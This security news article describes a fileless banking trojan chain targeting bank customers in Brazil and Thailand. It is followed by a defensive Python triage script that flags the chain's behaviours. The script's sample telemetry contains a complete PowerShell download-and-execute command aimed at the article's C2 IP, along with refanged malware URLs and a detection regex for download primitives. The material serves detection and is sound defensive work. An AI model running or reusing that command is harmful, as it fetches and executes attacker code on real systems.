Fileless malware attacks users of financial institutions

According to ethical hacking training specialists from the International Institute of Cyber Security (IICS), a group of researchers has discovered a new variety of fileless malware, attacking mainly clients of banks in countries such as Brazil and Thailand, that uses a hacking tool and at least two tools for information theft.

Ethical hacking training specialists mention that the malware (Trojan.BAT.BANLOAD.THBAIAI) connects to hxxp://35[.]227[.]52[.]26/Mods/AL/MD[.]zipmn to download PowerShell code. The malware then connects to hxxp://35[.]227[.]52[.]26/Loads/20938092830482 to run the code and contacts another URL before renaming its files to resemble legitimate Windows functions.

Finally, the malware restarts the infected computer to display a fake lock screen intended to trick the victim into entering their logon credentials.

As it begins to download its payloads, the malware fetches two further hacking tools. The first (TrojanSpy.Win32.BANRAP.AS) launches the victim's Outlook and sends the stored email addresses to its command and control server. The second (HKTL_RADMIN) allows an attacker to gain administrator privileges on the compromised system.

When the user logs on again, the malware drops a file that loads a third hacking tool (Trojan.JS.BANKer.THBAIAI), which scans the victim's browsing history for banking information. When it finds something of interest, it collects the data and sends it to its C&C server.
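The chain described above, turned into defensive logic: the following Python triage function is an added example written for this article, not code from the researchers or from IICS. It scans endpoint telemetry (the records below are constructed, modelled on process-creation and network events) for three behaviours the article names: a PowerShell download cradle, contact with the IP address the article lists, and a process named like a Windows component but running outside the location where that component legitimately lives. The record format, the allow-list of expected paths and the list of script hosts are assumptions; the IP and URL paths are the article's own indicators with the defanging removed.

```python
import ipaddress
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Indicator taken from the article (written there defanged as 35[.]227[.]52[.]26).
KNOWN_C2_HOSTS = {"35.227.52.26"}

# The article does not say which Windows components the malware imitates, so
# this allow-list of where a few well-known binaries legitimately live is an
# assumption: a process with one of these names running elsewhere is flagged.
EXPECTED_PATHS = {
    "svchost.exe": {r"c:\windows\system32\svchost.exe",
                    r"c:\windows\syswow64\svchost.exe"},
    "lsass.exe": {r"c:\windows\system32\lsass.exe"},
    "csrss.exe": {r"c:\windows\system32\csrss.exe"},
    "explorer.exe": {r"c:\windows\explorer.exe"},
}

# PowerShell primitives commonly used to fetch and execute remote code.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    re.IGNORECASE,
)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return the findings for one telemetry record (empty list if benign)."""
    findings: List[str] = []
    image = event.get("image", "").lower()
    name = image.rsplit("\\", 1)[-1]

    if event.get("type") == "network":
        host = urlparse(event.get("url", "")).hostname or ""
        if host in KNOWN_C2_HOSTS:
            findings.append(f"known C2 host {host}")
        # A script host pulling content straight from a raw IP address is the
        # shape of the download stage described in the article.
        try:
            ipaddress.ip_address(host)
            if name in SCRIPT_HOSTS:
                findings.append(f"{name} fetching from raw IP {host}")
        except ValueError:
            pass  # hostname is a DNS name (or empty), not an IP literal

    elif event.get("type") == "process":
        command_line = event.get("command_line", "")
        if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE.search(command_line):
            findings.append("PowerShell download cradle")
        if name in EXPECTED_PATHS and image not in EXPECTED_PATHS[name]:
            findings.append(f"{name} running outside its expected location")

    return findings


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run analyze_event over a sequence of records and keep only the hits."""
    hits = []
    for index, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            hits.append((index, findings))
    return hits


# Constructed telemetry modelled on the chain in the article. The URLs reuse the
# article's indicators; file paths and the benign Outlook record are invented.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process", "image": PS,
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://35.227.52.26/Loads/20938092830482')\""},
    {"type": "network", "image": PS, "url": "http://35.227.52.26/Mods/AL/MD.zipmn"},
    {"type": "process", "image": r"C:\Users\victim\AppData\Roaming\svchost.exe",
     "command_line": "svchost.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
    {"type": "network", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "url": "https://outlook.office365.com/"},
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(findings)}")
```

Run stand-alone it prints the three flagged records (the cradle, the contact with the listed IP, and the impostor svchost.exe) and stays silent on the two benign ones. In production the same checks belong in SIEM or EDR rules over process-creation and network-connection events (Sysmon Event IDs 1 and 3) and PowerShell script-block logs (Event ID 4104), where they catch the download stage before any payload is written to disk.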

This campaign is one more example of the pronounced growth in fileless malware attacks in recent times; according to cybersecurity specialists, about 35% of the cyberattacks recorded in 2018 used some variety of fileless malware.

According to the ethical hacking training specialists, a professional cybersecurity service can defend an organization against most threats of this kind by updating software periodically. To complement this work, each organization's IT team must have an appropriate defense plan, combining machine learning and tools such as sandbox environments to ensure the best protection against fileless malware attacks.